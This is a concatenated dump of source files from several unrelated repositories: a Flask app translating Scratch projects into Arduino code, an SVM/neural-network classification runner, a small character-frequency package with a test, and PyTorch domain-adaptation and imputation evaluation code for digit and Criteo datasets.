Equals.to_arduino = patched_to_arduino
unpatched_init = Equals.__init__
def patched_init(*args, **kwargs):
    # NOTE(review): this marks the motion sensor as used on EVERY Equals
    # expression, not only isMoving comparisons — confirm this is intentional.
    global motion_sensor
    motion_sensor = True
    unpatched_init(*args, **kwargs)
Equals.__init__ = patched_init
unpatched_rv_init = ReadVar.__init__
def patched_rv_init(self, *args, **kwargs):
    unpatched_rv_init(self, *args, **kwargs)
    if self.varName == "acceleration":
        global motion_sensor
        motion_sensor = True
ReadVar.__init__ = patched_rv_init
unpatched_rv_to_arduino = ReadVar.to_arduino
def patched_rv_to_arduino(self):
    # Reads of "acceleration" become live sensor reads.
    if self.varName == "acceleration":
        return "motionSensor.intensity()"
    else:
        return unpatched_rv_to_arduino(self)
ReadVar.to_arduino = patched_rv_to_arduino
def get_scratch_project(scratch_id):
    """Fetch a project's JSON from the Scratch CDN.

    Raises NotFoundError for unknown IDs and requests.HTTPError for any other
    failed response. (The old code returned 0 on non-404 failures, which then
    crashed later inside the translation step with a confusing error; callers
    already wrap this in a broad try/except, so raising is safe.)
    """
    url = "http://cdn.projects.scratch.mit.edu/internalapi/project/{}/get/".format(scratch_id)
    response = requests.get(url)
    if response.ok:
        return response.json()
    elif response.status_code == 404:
        raise NotFoundError("Invalid project ID")
    else:
        response.raise_for_status()
@app.route('/')
def landing():
    """Render the landing page; show the traceback on template errors."""
    try:
        return landing_template.render()
    # BUG FIX: `except e:` raised a NameError (there is no name `e`) instead
    # of catching; catch Exception so the traceback page actually renders.
    except Exception:
        return traceback.format_exc()
def scratch_project_json_to_arduino(scratch_project):
    """Translate a project's JSON into a complete Arduino program string."""
    project = ScratchObject(scratch_project)
    helper_scripts = [s for s in project.get_scripts() if include_script(s)]
    return program_template.render(
        init_vars=project.state_to_arduino(exclude=excluded_vars, indent=0),
        setup=project.get_script("setup").block.to_arduino(),
        loop=project.get_script("loop").block.to_arduino(),
        helpers="\n".join(s.to_arduino() for s in helper_scripts),
        motion_sensor=motion_sensor
    )
@app.route('/translate/<int:scratch_id>')
def translate(scratch_id):
    """Fetch, translate, and render a Scratch project as Arduino code.

    Any failure renders the traceback so students can report problems.
    """
    try:
        project_json = get_scratch_project(scratch_id)
        program = scratch_project_json_to_arduino(project_json)
        now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        log.info(json.dumps({"time": now, "project": project_json}))
        # BUG FIX: was `baes_template`, a NameError on every request.
        return base_template.render(
            program=program,
            project_id=scratch_id
        )
    # BUG FIX: `except Exception, e:` is Python-2-only syntax (and `e` was
    # unused); the bare Exception clause works on Python 2.6+ and 3.
    except Exception:
        return "<h1>Something went wrong:</h1> <pre>{}</pre>".format(traceback.format_exc())
# Run the Flask development server when executed directly.
if __name__ == '__main__':
    app.run()
|
{"/scratch_object.py": ["/scratch_blocks.py"]}
|
28,008
|
rakshithxaloori/svm-ann
|
refs/heads/main
|
/classifier.py
|
import pandas as pd
import numpy as np
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.neural_network import MLPClassifier
from sklearn.svm import SVC
def test_classifier(clf, X, y):
    """ RETURN the accuracy on data X, y using classifier clf. """
    predictions = clf.predict(X)
    matches = sum(1 for predicted, gold in zip(predictions, y) if predicted == gold)
    return matches / len(y)
def svm_tasks(X_train, y_train, X_test, y_test, C_value, clf_type):
    """Fit a standardized SVC with the given kernel and C, then print
    train/test accuracy."""
    svc_kwargs = dict(C=C_value, gamma='auto', kernel=clf_type)
    if clf_type == 'poly':
        svc_kwargs['degree'] = 2  # quadratic polynomial kernel
    clf = make_pipeline(StandardScaler(), SVC(**svc_kwargs))
    # Testing
    clf.fit(np.array(X_train), np.array(y_train))
    print("kernel:", clf_type)
    print("C_value:", C_value)
    print("Accuracy:", test_classifier(clf, X_train, y_train), "on TRAIN data")
    print("Accuracy:", test_classifier(clf, X_test, y_test), "on TEST data")
    print("-----------------------------------------------------")
def ann_tasks(X_train, y_train, X_test, y_test, hidden_layers, learning_rate):
    """Fit an SGD-trained MLP with the given architecture and learning rate,
    then print train/test accuracy."""
    clf = MLPClassifier(hidden_layer_sizes=hidden_layers, solver='sgd',
                        learning_rate_init=learning_rate)
    # Testing
    clf.fit(np.array(X_train), np.array(y_train))
    print("architecture:", hidden_layers)
    print("#output layers:", clf.n_outputs_)
    print("learning rate:", learning_rate)
    print("Accuracy:", test_classifier(clf, X_train, y_train), "on TRAIN data")
    print("Accuracy:", test_classifier(clf, X_test, y_test), "on TEST data")
    print("-----------------------------------------------------")
|
{"/runner.py": ["/classifier.py"]}
|
28,009
|
rakshithxaloori/svm-ann
|
refs/heads/main
|
/runner.py
|
import sys
import csv
from sklearn.model_selection import train_test_split
from classifier import svm_tasks, ann_tasks
def convert_row_to_int(row):
    """Convert every CSV field in `row` to a number.

    Despite the name, values may be fractional, so float (not int) is used.
    """
    return [float(value) for value in row]
if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("Usage: python runner.py csv_path")
    csv_path = sys.argv[1]
    # Load features (all columns but the last) and labels (last column)
    # from a semicolon-delimited CSV.
    X = []
    y = []
    with open(csv_path, 'r') as csv_file:
        reader = csv.reader(csv_file, delimiter=";")
        for row in reader:
            X.append(convert_row_to_int(row[:-1]))
            y.append(row[-1])
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, shuffle=True)
    # Perform tasks
    print("SVMs")
    clf_types = ['linear', 'poly', 'rbf']
    # C_values obtained empirically (one per kernel, in order)
    C_values = [10.0, 100.0, 100.0]
    for C_value, clf_type in zip(C_values, clf_types):
        svm_tasks(X_train, y_train, X_test, y_test, C_value, clf_type)
    print("**********************************************************")
    print("**********************************************************")
    print("ANNs")
    # Grid over hidden-layer architectures and learning rates.
    for hidden_layers in [(), (2,), (6,), (2, 3,), (3, 2,)]:
        for learning_rate in [0.1, 0.01, 0.001, 0.0001, 0.00001]:
            ann_tasks(X_train, y_train, X_test, y_test, hidden_layers, learning_rate)
|
{"/runner.py": ["/classifier.py"]}
|
28,019
|
prabhath6/my_project
|
refs/heads/master
|
/my_project/module_one.py
|
# -*- coding: utf-8 -*-
from collections import Counter
def get_char_count(data):
    """Count occurrences of each character in `data`.

    :param data: str
    :return: Counter
    """
    return Counter(data)
|
{"/main.py": ["/my_project/module_two.py"]}
|
28,020
|
prabhath6/my_project
|
refs/heads/master
|
/main.py
|
# Entry point: demo custom_count on a sample string.
from my_project.module_two import custom_count
if __name__ == "__main__":
    print(custom_count("AAAAsdfsdvver", 3))
|
{"/main.py": ["/my_project/module_two.py"]}
|
28,021
|
prabhath6/my_project
|
refs/heads/master
|
/my_project/module_two.py
|
# -*- coding: utf-8 -*-
from my_project import module_one
def custom_count(data, count):
    """Return (character, frequency) pairs for characters that appear at
    least `count` times in `data`.

    :param data: str
    :param count: int
    :return: list
    """
    frequencies = module_one.get_char_count(data)
    return [(char, freq) for char, freq in frequencies.items() if freq >= count]
|
{"/main.py": ["/my_project/module_two.py"]}
|
28,022
|
prabhath6/my_project
|
refs/heads/master
|
/tests/test_module_two.py
|
from my_project import module_two
from nose.tools import assert_equal
class TestModuleTwo():
    """Nose-style tests for module_two.custom_count."""
    @classmethod
    def setup_class(klass):
        """This method is run once for each class before any tests are run"""
    @classmethod
    def teardown_class(klass):
        """This method is run once for each class _after_ all tests are run"""
    def setUp(self):
        """This method is run once before _each_ test method is executed"""
    def teardown(self):
        """This method is run once after _each_ test method is executed"""
    def test_module_two(self):
        # BUG FIX: expected/actual were swapped — the literal is the expected
        # value; the function's result is the actual one.
        expected = [('A', 4)]
        actual = module_two.custom_count("AAAAsdfsdvver", 3)
        assert_equal(actual, expected)
|
{"/main.py": ["/my_project/module_two.py"]}
|
28,027
|
mkirchmeyer/adaptation-imputation
|
refs/heads/main
|
/src/eval/utils_eval.py
|
import torch.nn.functional as F
from src.utils.utils_network import build_label_domain
import torch
from sklearn.metrics import roc_auc_score
import numpy as np
# Compact float formatting for any numpy arrays logged by this module.
np.set_printoptions(precision=4, formatter={'float_kind':'{:3f}'.format})
def evaluate_domain_classifier_class(model, data_loader, domain_label, is_target, is_criteo=False):
    """Accumulate domain-classifier metrics over one loader, labelling every
    batch with `domain_label`.

    Returns (summed loss, n_correct, summed per-batch mean P(domain=1));
    callers normalize by batch/dataset counts.
    """
    model.feat_extractor.eval()
    model.data_classifier.eval()
    model.grl_domain_classifier.eval()
    loss = 0
    correct = 0
    ave_pred = 0
    if is_criteo:
        # Criteo batches are (integer features, categorical features, label).
        for dataI, dataC, _ in data_loader:
            target = build_label_domain(model, dataI.size(0), domain_label)
            if model.cuda:
                dataI, dataC, target = dataI.cuda(), dataC.cuda(), target.cuda()
            data = model.construct_input(dataI, dataC)
            output_feat = model.feat_extractor(data)
            output = model.grl_domain_classifier(output_feat)
            loss += F.cross_entropy(output, target).item()
            pred = output.data.max(1)[1]  # get the index of the max log-probability
            correct += pred.eq(target.data).cpu().sum().item()
            # NOTE(review): F.softmax without dim= is deprecated — confirm dim=1.
            ave_pred += torch.mean(F.softmax(output)[:, 1]).item()
    else:
        for data, _ in data_loader:
            target = build_label_domain(model, data.size(0), domain_label)
            if model.cuda:
                data, target = data.cuda(), target.cuda()
            if model.adapt_only_first:
                data = torch.mul(data, model.mask_t)
                output_feat = model.feat_extractor(data)
            else:
                # Target samples may be masked (cropped) before extraction.
                if is_target and model.crop_dim != 0:
                    data = torch.mul(data, model.mask_t)
                output_feat = model.feat_extractor(data)
            output = model.grl_domain_classifier(output_feat)
            loss += F.cross_entropy(output, target).item()
            pred = output.data.max(1)[1]  # get the index of the max log-probability
            correct += pred.eq(target.data).cpu().sum().item()
            ave_pred += torch.mean(F.softmax(output)[:, 1]).item()
    return loss, correct, ave_pred
def evaluate_domain_classifier(model, data_loader_s, data_loader_t, comments="Domain", is_criteo=False):
    """Evaluate the GRL domain classifier on the source and target loaders
    and log combined and per-domain accuracy.

    Returns (mean loss over all batches, overall accuracy).
    """
    model.feat_extractor.eval()
    model.data_classifier.eval()
    model.grl_domain_classifier.eval()
    loss_s, correct_s, ave_pred_s = evaluate_domain_classifier_class(model, data_loader_s, model.domain_label_s,
                                                                     is_target=False, is_criteo=is_criteo)
    loss_t, correct_t, ave_pred_t = evaluate_domain_classifier_class(model, data_loader_t, model.domain_label_t,
                                                                     is_target=True, is_criteo=is_criteo)
    # Combine and normalize by the total number of batches.
    loss_s += loss_t
    loss_s /= (len(data_loader_s) + len(data_loader_t))
    nb_source = len(data_loader_s.dataset)
    nb_target = len(data_loader_t.dataset)
    nb_tot = nb_source + nb_target
    model.logger.info(
        "{}: Mean loss: {:.4f}, Accuracy: {}/{} ({:.2f}%), Accuracy S: {}/{} ({:.2f}%), Accuracy T: {}/{} "
        "({:.2f}%)".format(
            comments, loss_s, correct_s + correct_t, nb_tot, 100. * (correct_s + correct_t) / nb_tot, correct_s,
            nb_source, 100. * correct_s / nb_source, correct_t, nb_target, 100. * correct_t / nb_target))
    return loss_s, (correct_s + correct_t) / nb_tot
def evaluate_data_classifier(model, is_test=True, is_target=False, is_criteo=False):
    """Evaluate the label (data) classifier on one of the four loaders
    (train/test x source/target), logging loss/accuracy (+AUC for Criteo).

    Returns (mean loss, accuracy, weighted-accuracy placeholder, auc_roc).
    """
    model.feat_extractor.eval()
    model.data_classifier.eval()
    # Pick the loader and build the log prefix from the flags.
    comments = ""
    if is_test:
        comments += "Test"
        if is_target:
            comments += " T"
            data_loader = model.data_loader_test_t
        else:
            comments += " S"
            data_loader = model.data_loader_test_s
    else:
        comments += "Train"
        if is_target:
            comments += " T"
            data_loader = model.data_loader_train_t
        else:
            comments += " S"
            data_loader = model.data_loader_train_s
    test_loss = 0
    naive_loss = 0
    correct = 0
    prediction_prob = []
    test_y = []
    # NOTE(review): presumably the positive-class rate of the Criteo training
    # set, used as a constant-prediction baseline — confirm the source.
    naive_pred = 246872. / 946493.
    if is_criteo:
        for dataI, dataC, target in data_loader:
            target = target.view(-1)
            naive_output = torch.Tensor([1 - naive_pred, naive_pred]).repeat(dataI.size(0), 1)
            if model.cuda:
                dataI, dataC, target = dataI.cuda(), dataC.cuda(), target.cuda()
                naive_output = naive_output.cuda()
            data = model.construct_input(dataI, dataC)
            output_feat = model.feat_extractor(data)
            output = model.data_classifier(output_feat)
            test_loss += F.cross_entropy(output, target).item()
            naive_loss += F.nll_loss(torch.log(naive_output), target).item()
            pred = output.data.max(1)[1]  # get the index of the max log-probability
            correct += pred.eq(target.data).cpu().sum().item()
            prediction_prob = np.hstack([prediction_prob, output.cpu().detach().numpy()[:, 1]])
            test_y = np.hstack([test_y, target.cpu().numpy()])
    else:
        for data, target in data_loader:
            target = target.view(-1)
            if model.cuda:
                data, target = data.cuda(), target.cuda()
            if model.adapt_only_first:
                data = torch.mul(data, model.mask_t)
            elif is_target and model.crop_dim != 0:
                data = torch.mul(data, model.mask_t)
            output_feat = model.feat_extractor(data)
            output = model.data_classifier(output_feat)
            test_loss += F.cross_entropy(output, target).item()
            pred = output.data.max(1)[1]  # get the index of the max log-probability
            correct += pred.eq(target.data).cpu().sum().item()
    test_loss /= len(data_loader)  # loss function already averages over batch size
    naive_loss /= len(data_loader)
    auc_roc = 0.0
    weighted_acc = 0.0
    model.logger.info(
        "{}: Mean Loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)".format(
            comments, test_loss, correct, len(data_loader.dataset), 100. * correct / len(data_loader.dataset)))
    if is_criteo:
        model.logger.info("{}: Naive classifier mean Loss: {:.4f}".format(comments, naive_loss))
        auc_roc = roc_auc_score(test_y, prediction_prob)
        model.logger.info("{}: auc_roc: {:.4f}".format(comments, auc_roc))
    return test_loss, correct / len(data_loader.dataset), weighted_acc, auc_roc
##############
# Imputation #
##############
def compute_mse_imput(model, is_target=False, is_criteo=False):
    """Compute the normalized distance between reconstructed and true
    second-view features on the chosen test loader.

    Returns the mean per-batch normalized L2 distance (logged as NMSE).
    """
    model.feat_extractor1.eval()
    model.feat_extractor2.eval()
    model.reconstructor.eval()
    dist = 0
    if is_target:
        data_loader = model.data_loader_test_t
        comments = "T"
    else:
        data_loader = model.data_loader_test_s
        comments = "S"
    if is_criteo:
        for dataI, dataC, _ in data_loader:
            if model.cuda:
                dataI, dataC = dataI.cuda(), dataC.cuda()
            data1 = model.construct_input1(dataI, dataC)
            output_feat1 = model.feat_extractor1(data1)
            output_feat2_reconstr = model.reconstructor(output_feat1)
            data2 = model.construct_input2(dataI)
            output_feat2 = model.feat_extractor2(data2)
            # Normalize the L2 distance by the mean norm of both embeddings.
            mean_norm = (torch.norm(output_feat2).item() + torch.norm(output_feat2_reconstr).item()) / 2
            dist += torch.dist(output_feat2, output_feat2_reconstr, 2).item() / mean_norm
    else:
        for data, _ in data_loader:
            if model.cuda:
                data = data.cuda()
            data2 = torch.mul(data, model.mask_2)
            output_feat2 = model.feat_extractor2(data2)
            data1 = torch.mul(data, model.mask_1)
            output_feat1 = model.feat_extractor1(data1)
            output_feat2_reconstr = model.reconstructor(output_feat1)
            mean_norm = (torch.norm(output_feat2).item() + torch.norm(output_feat2_reconstr).item()) / 2
            dist += torch.dist(output_feat2, output_feat2_reconstr, 2).item() / mean_norm
    dist /= len(data_loader)
    if model.logger is not None:
        model.logger.info(f"Mean NMSE {comments}: {dist}")
    return dist
def evaluate_data_imput_classifier(model, is_test=True, is_target=False, is_criteo=False):
    """Evaluate the label classifier of the imputation model.

    Source samples use both real views; target samples replace the missing
    second view with the reconstructor's output. Logs loss/accuracy (+AUC for
    Criteo) and returns (mean loss, accuracy, weighted-acc placeholder, auc).
    """
    model.feat_extractor1.eval()
    model.feat_extractor2.eval()
    model.data_classifier.eval()
    model.reconstructor.eval()
    # Pick the loader and build the log prefix from the flags.
    comments = "Imput"
    if is_test:
        comments += " test"
        if is_target:
            comments += " T"
            data_loader = model.data_loader_test_t
        else:
            comments += " S"
            data_loader = model.data_loader_test_s
    else:
        comments += " train"
        if is_target:
            comments += " T"
            data_loader = model.data_loader_train_t
        else:
            comments += " S"
            data_loader = model.data_loader_train_s
    test_loss = 0
    correct = 0
    prediction_prob = []
    test_y = []
    if is_criteo:
        for dataI, dataC, target in data_loader:
            target = target.view(-1)
            if model.cuda:
                dataI, dataC, target = dataI.cuda(), dataC.cuda(), target.cuda()
            data1 = model.construct_input1(dataI, dataC)
            output_feat1 = model.feat_extractor1(data1)
            if is_target:
                # The second view is unavailable for target data: impute it.
                output_feat2 = model.reconstructor(output_feat1)
            else:
                data2 = model.construct_input2(dataI)
                output_feat2 = model.feat_extractor2(data2)
            output = model.data_classifier(torch.cat((output_feat1, output_feat2), 1))
            test_loss += F.cross_entropy(output, target).item()
            pred = output.data.max(1)[1]  # get the index of the max log-probability
            correct += pred.eq(target.data).cpu().sum().item()
            prediction_prob = np.hstack([prediction_prob, output.cpu().detach().numpy()[:, 1]])
            test_y = np.hstack([test_y, target.cpu().numpy()])
    else:
        for data, target in data_loader:
            target = target.view(-1)
            if model.cuda:
                data, target = data.cuda(), target.cuda()
            data1 = torch.mul(data, model.mask_1)
            output_feat1 = model.feat_extractor1(data1)
            if is_target:
                output_feat2 = model.reconstructor(output_feat1)
            else:
                data2 = torch.mul(data, model.mask_2)
                output_feat2 = model.feat_extractor2(data2)
            output = model.data_classifier(torch.cat((output_feat1, output_feat2), 1))
            test_loss += F.cross_entropy(output, target).item()
            pred = output.data.max(1)[1]  # get the index of the max log-probability
            correct += pred.eq(target.data).cpu().sum().item()
    test_loss /= len(data_loader)  # loss function already averages over batch size
    model.logger.info(
        "{}: Mean Loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)".format(
            comments, test_loss, correct, len(data_loader.dataset), 100. * correct / len(data_loader.dataset)))
    auc_roc = 0
    w_acc = 0
    if is_criteo:
        auc_roc = roc_auc_score(test_y, prediction_prob)
        model.logger.info("{}: auc_roc: {:.4f}".format(comments, auc_roc))
    return test_loss, correct / len(data_loader.dataset), w_acc, auc_roc
def evaluate_domain_imput_classifier(model, data_loader_s, data_loader_t, is_imputation, comments="Domain",
                                     is_criteo=False):
    """Evaluate a domain classifier of the imputation model and log accuracy.

    With is_imputation=True the "domains" are real vs reconstructed
    second-view features; otherwise the usual source vs target domains.
    Returns (summed loss, overall accuracy).
    """
    model.feat_extractor1.eval()
    model.feat_extractor2.eval()
    model.data_classifier.eval()
    model.grl_domain_classifier1.eval()
    model.grl_domain_classifier2.eval()
    model.reconstructor.eval()
    if is_imputation:
        # NOTE(review): both passes use data_loader_s — real and reconstructed
        # features are compared on the same source data; presumably
        # intentional — confirm.
        loss_s, correct_s = evaluate_domain_imput_classifier_class(model, data_loader_s,
                                                                   model.domain_label_true2,
                                                                   is_imputation=True, is_target=False,
                                                                   is_criteo=is_criteo)
        loss_t, correct_t = evaluate_domain_imput_classifier_class(model, data_loader_s,
                                                                   model.domain_label_fake2,
                                                                   is_imputation=True, is_target=True,
                                                                   is_criteo=is_criteo)
        compute_mse_imput(model, is_target=True, is_criteo=is_criteo)
        compute_mse_imput(model, is_target=False, is_criteo=is_criteo)
    else:
        loss_s, correct_s = evaluate_domain_imput_classifier_class(model, data_loader_s, model.domain_label_s,
                                                                   is_imputation=False, is_target=False,
                                                                   is_criteo=is_criteo)
        loss_t, correct_t = evaluate_domain_imput_classifier_class(model, data_loader_t, model.domain_label_t,
                                                                   is_imputation=False, is_target=True,
                                                                   is_criteo=is_criteo)
    loss_s += loss_t
    nb_source = len(data_loader_s.dataset)
    if is_imputation:
        nb_target = len(data_loader_s.dataset)
    else:
        nb_target = len(data_loader_t.dataset)
    nb_tot = nb_source + nb_target
    model.logger.info(
        "{}: Mean loss: {:.4f}, Accuracy: {}/{} ({:.2f}%), Accuracy S: {}/{} ({:.2f}%), Accuracy T: "
        "{}/{} ({:.0f}%)".format(
            comments, loss_s, correct_s + correct_t, nb_tot, 100. * (correct_s + correct_t) / nb_tot, correct_s,
            nb_source, 100. * correct_s / nb_source, correct_t, nb_target, 100. * correct_t / nb_target))
    return loss_s, (correct_s + correct_t) / nb_tot
def evaluate_domain_imput_classifier_class(model, data_loader, domain_label, is_imputation=True, is_target=False,
                                           is_criteo=False):
    """Accumulate one domain classifier's loss and correct count over a loader.

    is_imputation selects classifier 2 (real vs reconstructed second view);
    otherwise classifier 1 is applied to the concatenated views.
    Returns (summed loss, n_correct).
    """
    model.feat_extractor1.eval()
    model.feat_extractor2.eval()
    model.data_classifier.eval()
    model.grl_domain_classifier1.eval()
    model.grl_domain_classifier2.eval()
    model.reconstructor.eval()
    loss = 0
    correct = 0
    if is_criteo:
        # NOTE(review): this branch scores against the loader's class labels
        # (`target`), not a constructed domain label as in the else-branch —
        # confirm this asymmetry is intentional.
        for dataI, dataC, target in data_loader:
            target = target.view(-1)
            if model.cuda:
                dataI, dataC, target = dataI.cuda(), dataC.cuda(), target.cuda()
            if is_imputation:
                if not is_target:
                    data2 = model.construct_input2(dataI)
                    output_feat2 = model.feat_extractor2(data2)
                    output = model.grl_domain_classifier2(output_feat2)
                else:
                    data1 = model.construct_input1(dataI, dataC)
                    output_feat1 = model.feat_extractor1(data1)
                    output_feat2 = model.reconstructor(output_feat1)
                    output = model.grl_domain_classifier2(output_feat2)
            else:
                data1 = model.construct_input1(dataI, dataC)
                output_feat1 = model.feat_extractor1(data1)
                output_feat2 = model.reconstructor(output_feat1)
                output = model.grl_domain_classifier1(torch.cat((output_feat1, output_feat2), 1))
            loss += F.cross_entropy(output, target).item()
            pred = output.data.max(1)[1]  # get the index of the max log-probability
            correct += pred.eq(target.data).cpu().sum().item()
    else:
        for data, _ in data_loader:
            target = build_label_domain(model, data.size(0), domain_label)
            if model.cuda:
                data, target = data.cuda(), target.cuda()
            if is_imputation:
                if not is_target:
                    data2 = torch.mul(data, model.mask_2)
                    output_feat2 = model.feat_extractor2(data2)
                    output = model.grl_domain_classifier2(output_feat2)
                else:
                    data1 = torch.mul(data, model.mask_1)
                    output_feat1 = model.feat_extractor1(data1)
                    output_feat2 = model.reconstructor(output_feat1)
                    output = model.grl_domain_classifier2(output_feat2)
            else:
                data1 = torch.mul(data, model.mask_1)
                output_feat1 = model.feat_extractor1(data1)
                output_feat2 = model.reconstructor(output_feat1)
                output = model.grl_domain_classifier1(torch.cat((output_feat1, output_feat2), 1))
            loss += F.cross_entropy(output, target).item()
            pred = output.data.max(1)[1]  # get the index of the max log-probability
            correct += pred.eq(target.data).cpu().sum().item()
    return loss, correct
|
{"/src/eval/utils_eval.py": ["/src/utils/utils_network.py"], "/experiments/launcher/criteo_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/criteo/dann_criteo.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/models/digits/djdot_digits.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/experiments/launcher/digits_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/digits/dann_imput_digits.py", "/src/models/digits/djdot_imput_digits.py", "/src/models/digits/djdot_digits.py", "/src/utils/utils_network.py"], "/src/plotting/utils_plotting.py": ["/src/utils/utils_network.py"], "/experiments/__init__.py": ["/experiments/launcher/experiments_criteo.py", "/experiments/launcher/experiments_mnist_mnistm.py"], "/src/dataset/utils_dataset.py": ["/src/dataset/dataset_criteo.py", "/experiments/launcher/config.py", "/src/dataset/sampler.py"], "/src/models/criteo/dann_criteo.py": ["/src/eval/utils_eval.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/utils/utils_network.py": ["/src/utils/network.py"], "/orchestration/launcher.py": ["/experiments/__init__.py"], "/src/dataset/dataset_criteo.py": ["/src/dataset/sampler.py"], "/src/models/digits/dann_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"]}
|
28,028
|
mkirchmeyer/adaptation-imputation
|
refs/heads/main
|
/experiments/launcher/criteo_binary.py
|
# Launcher script: trains a DANN or DANN-with-imputation model on the Criteo
# click dataset (known users => new users) and logs final metrics.
import random
import numpy as np
import torch
import time
from experiments.launcher.config import Config, dummy_model_config
from src.dataset.utils_dataset import create_dataset_criteo
from src.models.criteo.dann_imput_criteo import DANNImput
from src.models.criteo.dann_criteo import DANN
from src.utils.utils_network import create_logger, set_logger, set_nbepoch, create_log_name
n_class = 2  # binary classification (click / no-click)
debug = False  # set True to run with the lightweight dummy config instead of CLI args
if debug:
    config = dummy_model_config
    in_memory = False
else:
    config = Config.get_config_from_args()
    in_memory = True
# Seed every RNG source with the same seed for reproducibility.
# python RNG
random.seed(config.model.random_seed)
# pytorch RNGs
torch.manual_seed(config.model.random_seed)
torch.backends.cudnn.deterministic = True
if torch.cuda.is_available():
    torch.cuda.manual_seed_all(config.model.random_seed)
# numpy RNG
np.random.seed(config.model.random_seed)
cuda = torch.cuda.is_available()
if cuda:
    torch.cuda.set_device(config.run.gpu_id)
name = create_log_name("criteo", config)
# NOTE(review): assumes a ./results/ directory exists relative to the working dir — confirm
logger = create_logger(f"./results/{name}.log")
logger.info(f"config: {config}")
# Cardinality of each categorical feature; path is relative to this script's package location
feature_sizes = np.loadtxt('../../data/feature_sizes.txt', delimiter=',')
if config.model.use_categorical:
    # presumably columns 13..38 are the categorical fields of the Criteo row format — TODO confirm
    indexes = np.arange(13, 39)
    feature_sizes = np.array([int(x) for x in feature_sizes])[13:]
else:
    indexes = np.array([25])
    feature_sizes = None
logger.info("####################")
logger.info(f"Known users => New users")
logger.info("===DATA===")
data_loader_train_s, data_loader_test_s, data_loader_train_t, data_loader_test_t, data_loader_train_s_init = \
    create_dataset_criteo(config, "../..", is_balanced=config.model.is_balanced, in_memory=in_memory, indexes=indexes)
n_dim = (len(data_loader_train_s.dataset), 10)  # NOTE(review): n_dim appears unused below — confirm before removing
logger.info(f"n_instances_train_s: {len(data_loader_train_s.dataset)}")
logger.info(f"n_instances_train_t: {len(data_loader_train_t.dataset)}")
logger.info(f"n_instances_test_s: {len(data_loader_test_s.dataset)}")
logger.info(f"n_instances_test_t: {len(data_loader_test_t.dataset)}")
final_metrics = {
    "source_classif": dict(),
    "target_classif": dict()
}
start_time = time.time()
# NOTE(review): if config.model.mode is neither "dann" nor "dann_imput", `model`
# is never bound and the metric collection below raises NameError — confirm intended.
if config.model.mode == "dann":
    logger.info("===DANN===")
    model = DANN(data_loader_train_s, data_loader_train_t, data_loader_train_s_init=data_loader_train_s_init,
                 model_config=config.model, cuda=cuda, data_loader_test_s=data_loader_test_s,
                 data_loader_test_t=data_loader_test_t, feature_sizes=feature_sizes, n_class=n_class,
                 logger_file=logger)
    set_nbepoch(model, config.training.n_epochs)
    model.fit()
if config.model.mode == "dann_imput":
    logger.info("===DANN IMPUT===")
    model = DANNImput(data_loader_train_s, data_loader_train_t, model_config=config.model, cuda=cuda,
                      data_loader_train_s_init=data_loader_train_s_init, feature_sizes=feature_sizes,
                      data_loader_test_s=data_loader_test_s, data_loader_test_t=data_loader_test_t, n_class=n_class)
    # DANNImput receives its logger via setter; DANN above takes it in the constructor
    set_logger(model, logger)
    set_nbepoch(model, config.training.n_epochs)
    model.fit()
# Test metrics are attributes set by model.fit()
final_metrics["source_classif"] = {
    "test_loss": model.loss_test_s,
    "test_acc": model.acc_test_s,
    "test_auc": model.auc_test_s
}
final_metrics["target_classif"] = {
    "test_loss": model.loss_test_t,
    "test_acc": model.acc_test_t,
    "test_auc": model.auc_test_t
}
if config.model.mode == "dann":
    # single domain discriminator
    final_metrics["domain"] = {
        "test_loss": model.loss_d_test,
        "test_acc": model.acc_d_test
    }
elif config.model.mode.find("dann_imput") != -1:
    # imputation variant trains two domain discriminators
    final_metrics["domain1"] = {
        "test_loss": model.loss_d1_test,
        "test_acc": model.acc_d1_test
    }
    final_metrics["domain2"] = {
        "test_loss": model.loss_d2_test,
        "test_acc": model.acc_d2_test
    }
final_metrics["elapsed_time"] = time.time() - start_time
final_metrics["status"] = "completed"
logger.info(final_metrics)
|
{"/src/eval/utils_eval.py": ["/src/utils/utils_network.py"], "/experiments/launcher/criteo_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/criteo/dann_criteo.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/models/digits/djdot_digits.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/experiments/launcher/digits_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/digits/dann_imput_digits.py", "/src/models/digits/djdot_imput_digits.py", "/src/models/digits/djdot_digits.py", "/src/utils/utils_network.py"], "/src/plotting/utils_plotting.py": ["/src/utils/utils_network.py"], "/experiments/__init__.py": ["/experiments/launcher/experiments_criteo.py", "/experiments/launcher/experiments_mnist_mnistm.py"], "/src/dataset/utils_dataset.py": ["/src/dataset/dataset_criteo.py", "/experiments/launcher/config.py", "/src/dataset/sampler.py"], "/src/models/criteo/dann_criteo.py": ["/src/eval/utils_eval.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/utils/utils_network.py": ["/src/utils/network.py"], "/orchestration/launcher.py": ["/experiments/__init__.py"], "/src/dataset/dataset_criteo.py": ["/src/dataset/sampler.py"], 